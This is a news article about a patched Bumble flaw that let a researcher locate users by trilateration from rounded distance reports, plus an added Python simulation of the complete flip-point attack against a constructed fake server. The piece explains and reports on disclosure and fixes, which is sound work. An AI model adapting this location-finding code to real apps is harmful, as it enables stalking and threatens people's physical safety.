A security flaw in the popular dating app Bumble allowed attackers to determine the exact position of other users.
Bumble, which now has over 100 million members globally, mimics Tinder’s ‘swipe right’ feature for expressing interest in possible dates and shows users the estimated geographic distance to potential matches.
Using fictitious Bumble profiles, a security researcher devised and carried out a ‘trilateration’ attack that pinpointed the exact location of a fictitious victim.
As a consequence, Bumble patched a flaw that could have enabled stalking if left unaddressed.
According to Robert Heaton, a software engineer at payments processor Stripe, his discovery could have given attackers the ability to locate victims’ homes and, to some extent, monitor their movements.
However, “it wouldn’t give an attacker a literal live feed of a victim’s location, since Bumble doesn’t update location all that often, and rate limits might mean that you can only check [say] once an hour (I don’t know, I didn’t check),” he said in an interview.
For the discovery, the researcher received a $2,000 bug bounty, which he donated to the Against Malaria Foundation.
Overturning The Script
As part of his investigation, Heaton built an automated script that issued a series of requests to Bumble’s servers, repeatedly changing the attacker’s reported location and then querying the distance to the victim.
In a blog post, Heaton sketched a hypothetical scenario to show how the attack would play out in practice: “If an attacker (i.e. us) can find the point at which the reported distance to a user flips from, say, 3 miles to 4 miles, the attacker can infer that this is the point at which their victim is exactly 3.5 miles away from them.” For example, “3.49999 miles rounds down to 3 miles, 3.50000 rounds up to 4,” Heaton added.
Once they had found three such “flipping points”, the attacker would know three exact distances to their target, which is all that accurate trilateration requires.
In practice, however, Bumble always rounds distances down (it ‘floors’ them) rather than rounding to the nearest mile.
“This discovery doesn’t break the attack,” Heaton said. “It just means you have to edit your script to note that the point at which the distance flips from 3 miles to 4 miles is the point at which the victim is exactly 4.0 miles away, not 3.5 miles.”
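The following simulation shows the flipping-point technique end to end, including the floor-versus-round-to-nearest correction Heaton describes. It is an added example and is not Heaton’s script or Bumble’s code: the victim position, the three probe start points, the fake distance server and the assumption that distances are computed by the haversine formula are all constructed for illustration. The attacker works in a flat-earth frame around the first probe point, which is accurate to a few metres at this scale.

```python
"""Distance-flip trilateration against a server that reports only whole miles.
Added illustration, not Robert Heaton's script or Bumble's code; the victim
position, the probe points and the fake server are all constructed."""
import math

EARTH_RADIUS_MILES = 3958.8
# Constructed victim position; only the fake server ever reads it.
VICTIM = (37.7749, -122.4194)
# Constructed probes (start_lat, start_lon, bearing_deg), each starting a different
# whole number of miles away so that a wrong rounding assumption cannot cancel out.
PROBES = [
    (37.80, -122.45, 0.0),
    (37.72, -122.50, 90.0),
    (37.70, -122.35, 200.0),
]

def haversine_miles(lat1, lon1, lat2, lon2):
    """Great-circle distance, used by the fake server as ground truth."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_MILES * math.asin(math.sqrt(a))

class FakeDistanceServer:
    """Stand-in for the app's API: knows the victim's exact position but returns an
    integer. 'floor' is what Heaton found Bumble doing; 'nearest' is round-half-up."""
    def __init__(self, victim, rounding="floor"):
        self._victim, self._rounding, self.queries = victim, rounding, 0
    def reported_distance(self, lat, lon):
        self.queries += 1
        d = haversine_miles(lat, lon, *self._victim)
        return math.floor(d) if self._rounding == "floor" else math.floor(d + 0.5)

# Attacker side: a flat-earth frame around a reference point, good to a few metres here.
def to_xy(lat, lon, ref):
    x = math.radians(lon - ref[1]) * EARTH_RADIUS_MILES * math.cos(math.radians(ref[0]))
    return x, math.radians(lat - ref[0]) * EARTH_RADIUS_MILES

def from_xy(x, y, ref):
    lat = ref[0] + math.degrees(y / EARTH_RADIUS_MILES)
    return lat, ref[1] + math.degrees(x / (EARTH_RADIUS_MILES * math.cos(math.radians(ref[0]))))

def find_flip(server, start, bearing_deg, ref, span_miles=20.0, iters=60):
    """Bisect along a bearing for the first point where the reported distance exceeds
    the value k seen at the start. Distance along a ray is convex, so 'reported > k'
    is false up to the flip and true beyond it. Returns ((x, y) of the flip, k)."""
    k = server.reported_distance(*start)
    sx, sy = to_xy(*start, ref)
    ux, uy = math.sin(math.radians(bearing_deg)), math.cos(math.radians(bearing_deg))
    def reported_at(t):
        return server.reported_distance(*from_xy(sx + t * ux, sy + t * uy, ref))
    if reported_at(span_miles) <= k:
        raise ValueError("no flip within span along this bearing")
    lo, hi = 0.0, span_miles
    for _ in range(iters):
        mid = (lo + hi) / 2
        if reported_at(mid) > k:
            hi = mid
        else:
            lo = mid
    return (sx + hi * ux, sy + hi * uy), k

def intersect_circles(circles):
    """Three (x, y, r) circles solved by subtracting the equations pairwise. Also
    returns max |dist - r|, which is only ~0 when the radii really fit the centres."""
    (x1, y1, r1), (x2, y2, r2), (x3, y3, r3) = circles
    a, b = 2 * (x2 - x1), 2 * (y2 - y1)
    c = r1 ** 2 - r2 ** 2 - x1 ** 2 + x2 ** 2 - y1 ** 2 + y2 ** 2
    d, e = 2 * (x3 - x1), 2 * (y3 - y1)
    f = r1 ** 2 - r3 ** 2 - x1 ** 2 + x3 ** 2 - y1 ** 2 + y3 ** 2
    det = a * e - b * d
    x, y = (c * e - b * f) / det, (a * f - c * d) / det
    resid = max(abs(math.hypot(x - cx, y - cy) - r) for cx, cy, r in circles)
    return (x, y), resid

def run_attack(assumed_rounding="floor", server_rounding="floor"):
    """Returns (est_lat, est_lon, residual_miles, api_queries)."""
    server = FakeDistanceServer(VICTIM, server_rounding)
    ref = PROBES[0][:2]
    circles = []
    for slat, slon, bearing in PROBES:
        (fx, fy), k = find_flip(server, (slat, slon), bearing, ref)
        # Heaton's correction: under floor() the k -> k+1 flip is exactly k+1 miles
        # from the victim; under round-to-nearest it would be k + 0.5 miles.
        r = k + 1.0 if assumed_rounding == "floor" else k + 0.5
        circles.append((fx, fy, r))
    (x, y), resid = intersect_circles(circles)
    lat, lon = from_xy(x, y, ref)
    return lat, lon, resid, server.queries

if __name__ == "__main__":
    for assumed in ("floor", "nearest"):
        lat, lon, resid, n = run_attack(assumed_rounding=assumed)
        print(f"assuming {assumed}: off by {haversine_miles(lat, lon, *VICTIM):.4f} mi, "
              f"residual {resid:.3f} mi after {n} API calls")
```

Against the floor() server, assuming floor recovers the victim to within a few metres; assuming round-to-nearest (radius k + 0.5) lands a few hundred metres off, and the circle residual reported alongside the estimate exposes the wrong assumption, since three circles with mis-sized radii never meet at one point. Each probe costs about 62 API calls here, which is why the rate limits Heaton mentions matter to the practicality of the attack.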
Heaton was also able to forge ‘swipe yes’ requests targeting anyone who had expressed interest in a profile, without paying the $1.99 fee. That attack depended on bypassing the API’s request signature verification.
Heaton discovered the flaw on June 15, and it was reportedly patched within 72 hours.
He commended Bumble in particular for introducing additional restrictions “that prevent you from matching with or viewing users who aren’t in your match queue” as “a shrewd way to reduce the impact of future vulnerabilities”.
In his vulnerability report, Heaton also suggested that Bumble snap users’ positions to the nearest 0.1 degrees of latitude and longitude before computing the distance between them, and then round the result to the nearest mile.
“There would be no way that a future vulnerability could expose a user’s exact location via trilateration since the distance calculations won’t even have access to any exact locations,” Heaton explained.